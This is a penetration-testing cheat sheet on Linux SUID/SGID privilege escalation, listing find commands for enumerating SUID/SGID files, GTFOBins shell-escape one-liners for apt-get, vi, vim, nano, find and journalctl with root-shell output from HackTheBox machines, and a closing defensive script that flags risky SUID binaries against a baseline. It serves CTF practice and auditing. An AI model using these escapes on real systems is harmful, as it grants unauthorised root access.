# SUID/SGID

## SUID/SGID

```
find / -perm -u=s -type f 2>/dev/null

# Find files with SUID configured
find / -perm -4000 -type f 2>/dev/null
find / -perm 4755

# Find all the SUID/SGID executables 
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
```

## Enum SUID / SGID - Find

```
find /etc -perm 777
find / -user username

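# Find files whose mode is exactly 4755 (SUID, rwxr-xr-x)
find /usr/bin -perm 4755

# Find files whose mode is exactly 2755 (SGID, rwxr-xr-x)
find /usr/bin -perm 2755

# Find files with the Sticky Bit configured
# (-perm /1444 would also match any file with a read bit set)
find /etc -perm -1000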
```

{% embed url="<https://www.redhat.com/sysadmin/audit-permissions-find>" %}

## Setuid

The `setuid` bit appears as an `s` in place of the owner's `x` in `ls -l` output (for example `-rwsr-xr-x`).

```shell-session
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
```

## Setgid

```
find / -uid 0 -perm -6000 -type f 2>/dev/null
```

```shell-session
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

-rwsr-sr-x 1 root root 85832 Nov 30  2017 /usr/lib/snapd/snap-confine
```

## GTFOBins

{% embed url="<https://gtfobins.github.io/>" %}

### apt-get

```shell-session
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

# id
uid=0(root) gid=0(root) groups=0(root)
```

### Vi

```
sudo vi
:!sh
```

### More -> Vim

Reduce the terminal size as much as possible to trap More. Once in More, press `v` to enter Vim.

```
# In vim
:set shell=/bin/sh
:shell
```

{% embed url="<https://gtfobins.github.io/gtfobins/vim/>" %}

### Nano

```
./nano
^R^X
reset; sh 1>&0 2>&0
```

{% embed url="<https://gtfobins.github.io/gtfobins/nano/#file-read>" %}

{% embed url="<https://0xss0rz.github.io/2020-08-05-HTB-OpenAdmin/>" %}

### Find

```
find . -exec /bin/sh -p \; -quit
```

{% embed url="<https://gtfobins.github.io/gtfobins/find/>" %}

### Journalctl

```
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-12-16 07:49:55 EST, end at Mon 2019-12-16 07:50:52 E
Dec 16 07:50:00 traverxec systemd[1]: Starting nostromo nhttpd server...
Dec 16 07:50:00 traverxec systemd[1]: nostromo.service: Can't open PID file /v
Dec 16 07:50:00 traverxec nhttpd[451]: started
Dec 16 07:50:00 traverxec nhttpd[451]: max. file descriptors = 1040 (cur) / 10
Dec 16 07:50:00 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls
```

{% embed url="<https://0xss0rz.github.io/2020-08-05-HTB-Traverxec/>" %}

{% embed url="<https://gtfobins.github.io/gtfobins/journalctl/>" %}

### Systemctl

{% embed url="<https://gtfobins.github.io/gtfobins/systemctl/>" %}

## Tool

{% embed url="<https://github.com/Frissi0n/GTFONow>" %}
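
A defender's counterpart to the enumeration and GTFOBins sections above, as an added example that is not part of the original page or of any tool it links: it lists the SUID/SGID files under a directory and labels each one `RISKY` (basename matches a binary this page lists under GTFOBins), `OK` (path present in a baseline file) or `NEW`. The function name `audit_suid`, the baseline format (one path per line) and the `RISKY` list are assumptions of this example, and it relies on `stat -c` (GNU coreutils or BusyBox).

```shell
#!/bin/sh
# Added example: SUID/SGID audit against a baseline (hypothetical helper).
# RISKY holds only the binaries this page lists under GTFOBins.
RISKY="apt-get vi vim more nano find journalctl systemctl"

# audit_suid ROOT [BASELINE]
# Prints one line per SUID/SGID regular file found under ROOT:
#   RISKY <mode> <owner> <path>   basename is in $RISKY
#   OK    <mode> <owner> <path>   path is listed in BASELINE
#   NEW   <mode> <owner> <path>   anything else (review it)
audit_suid() (
    root=$1
    baseline=${2:-/dev/null}   # no baseline: every file is NEW or RISKY
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r path; do
        name=${path##*/}
        # Octal mode and owner; skip files that vanished or are unreadable.
        meta=$(stat -c '%a %U' "$path" 2>/dev/null) || continue
        status=NEW
        # Exact, whole-line match so /usr/bin/su does not approve /usr/bin/sudo.
        grep -Fxq -- "$path" "$baseline" && status=OK
        # A shell-capable binary stays RISKY even when it is in the baseline.
        case " $RISKY " in
            *" $name "*) status=RISKY ;;
        esac
        printf '%s %s %s\n' "$status" "$meta" "$path"
    done | sort
)

# Stand-alone use: ./audit_suid.sh /usr/bin /etc/suid-baseline.txt
if [ "$#" -gt 0 ]; then
    audit_suid "$@"
fi
```

Run it from a scheduled job and alert on any `RISKY` or `NEW` line; the baseline is simply the reviewed output of an earlier run, reduced to paths.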
